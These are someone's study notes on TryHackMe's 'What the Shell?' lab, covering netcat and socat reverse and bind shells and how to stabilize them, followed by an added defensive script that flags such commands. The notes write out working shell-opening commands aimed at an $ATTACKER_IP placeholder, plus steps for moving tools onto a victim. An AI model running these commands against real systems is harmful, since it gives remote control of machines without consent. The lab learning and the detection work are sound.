TryHackMe: Complete Beginner

author: Nathan Acks
date: 2021-10-27

What the Shell?

What Is a Shell?

Terminology:

Tools

Typical tools for creating reverse shells or connecting to bind shells:

Useful sites:

Also check out /usr/share/webshells on Kali Linux.

Types of Shells

Example reverse shell:

Example bind shell:

These are almost, but not quite, mirror images of each other.

Most initial reverse shells (in particular web shells) are non-interactive.

Netcat

While binding to well-known ports requires the use of sudo, it’s also less likely to get flagged/blocked by intermediate firewalls.

Netcat Shell Stabilization

One thing that causes a reverse shell to be non-interactive is when it's running in a shell itself. It's generally possible to stabilize these and get a fully interactive shell on UNIX-like systems:

Note that the stty command can be canceled using reset (after closing the reverse shell). Since echo is turned off, typing this won’t be visible. Trust the force!

You can mostly bypass the need for the stty command by using rlwrap, which sets all of this up for you (though it doesn’t redirect control sequences, so Ctrl+C will still kill the connection).

It’s also possible to upgrade to a socat-powered shell, assuming that you have a statically-compiled version of socat. Typically, the way that you’d transfer this binary is by first spinning up a simple webserver in the directory with your socat binary on the attack machine, and then downloading that binary to the victim.

NOTE that in none of these cases will the reverse shell pick up on your terminal size, so you’ll need to manually specify it using stty rows and stty cols.

Socat

Socat: Just an anything-to-anything connector!

# Reverse shell (attacker)
#
nc -lnp $LISTENER_PORT
socat TCP-LISTEN:$LISTENER_PORT -

# Reverse shell (target)
#
nc $ATTACKER_IP $LISTENER_PORT -e /bin/bash
socat TCP:$ATTACKER_IP:$LISTENER_PORT EXEC:"/bin/bash -li"

# Bind shell (attacker)
#
nc $TARGET_IP $LISTENER_PORT
socat TCP:$TARGET_IP:$LISTENER_PORT -

# Bind shell (target)
#
nc -lnp $LISTENER_PORT -e /bin/bash
socat TCP-LISTEN:$LISTENER_PORT EXEC:"/bin/bash -li"

This gets us an interactive login shell right out the gate, though we’re still vulnerable to Ctrl+C. Note that when binding to PowerShell, use powershell.exe,pipes in order to force PowerShell to use UNIX-style STDIN/STDOUT.
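A defender-side check, added here as an example and not part of the TryHackMe room or these notes: a POSIX sh script that classifies process command lines as bind shells, reverse shells, or benign, keying on the same nc -e and socat EXEC: patterns listed above (ncat's --exec/--sh-exec and socat's SYSTEM: address are assumed equivalents). The sample command lines are constructed, and the function and variable names are my own.

```shell
#!/bin/sh
# Added example: classify process command lines (as seen in a ps listing or an
# audit log) as bind-shell, reverse-shell, or benign, based on the nc/socat
# forms used in the notes above. Not part of the original notes.

# Constructed sample of process command lines (not real captures).
SAMPLE_CMDLINES='nc -lnp 4444 -e /bin/bash
socat TCP:10.0.0.5:4444 EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane
nc -lnp 8080
socat TCP-LISTEN:9001 -
socat TCP-LISTEN:4444 EXEC:"/bin/bash -li"
sshd: user [priv]
nc -zv 10.0.0.5 22'

# classify_cmdline CMDLINE -> prints bind-shell, reverse-shell, or benign.
# The deciding question is: does the process hand a program (a shell) to the
# socket, and if so, is it listening (bind) or connecting out (reverse)?
classify_cmdline() {
    cmd=$1
    case "$cmd" in
        nc\ *|netcat\ *|ncat\ *)
            case "$cmd" in
                *"-e "*|*--exec*|*--sh-exec*)   # program attached to the socket
                    case "$cmd" in
                        *-l*) echo bind-shell ;;    # -l: listening side
                        *)    echo reverse-shell ;;
                    esac ;;
                *) echo benign ;;                   # plain connect/scan/transfer
            esac ;;
        socat\ *)
            case "$cmd" in
                *EXEC:*|*SYSTEM:*)                  # program attached to the socket
                    case "$cmd" in
                        *-LISTEN:*|*-L:*) echo bind-shell ;;
                        *)                echo reverse-shell ;;
                    esac ;;
                *) echo benign ;;                   # plain relay, e.g. TCP-LISTEN:port -
            esac ;;
        *) echo benign ;;
    esac
}

# scan_cmdlines: read command lines on stdin, print "<verdict><TAB><cmdline>"
# for everything that is not benign.
scan_cmdlines() {
    while IFS= read -r line; do
        verdict=$(classify_cmdline "$line")
        [ "$verdict" = benign ] || printf '%s\t%s\n' "$verdict" "$line"
    done
}

# count_flagged: number of suspicious entries in the constructed sample.
count_flagged() {
    printf '%s\n' "$SAMPLE_CMDLINES" | scan_cmdlines | wc -l | tr -d ' '
}

# Usage: show the flagged sample lines and the count.
printf '%s\n' "$SAMPLE_CMDLINES" | scan_cmdlines
count_flagged
```

The point of the nested case statements is that a listener or an outbound connection by itself proves nothing (the third and fourth sample lines are ordinary port forwards); it is the -e / EXEC: half that marks a shell, and the listen/connect half that only decides which kind.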

We can use socat to create an auto-stabilized reverse shell on UNIX-like systems (though we will still need to use stty to set rows/columns).

# Attacker: Connect $LISTENER_PORT to the current TTY,
# send raw keycodes, and turn off terminal echo.
# Basically the equivalent of `stty raw -echo`.
#
socat TCP-LISTEN:$LISTENER_PORT FILE:`tty`,raw,echo=0

# Target: Connect the listener on the attacker to an
# interactive login bash shell.
#
#     pty    - allocate a PTTY
#     stderr - redirect STDERR to the attacker
#     sigint - pass signals (Ctrl+C) through
#     setsid - use a new session
#     sane   - use a variety of tweaks to "normalize" the
#              terminal's environment
#
socat TCP:$ATTACKER_IP:$LISTENER_PORT \
	EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane

NOTE that it’s perfectly acceptable to kick off a socat process from inside a netcat process!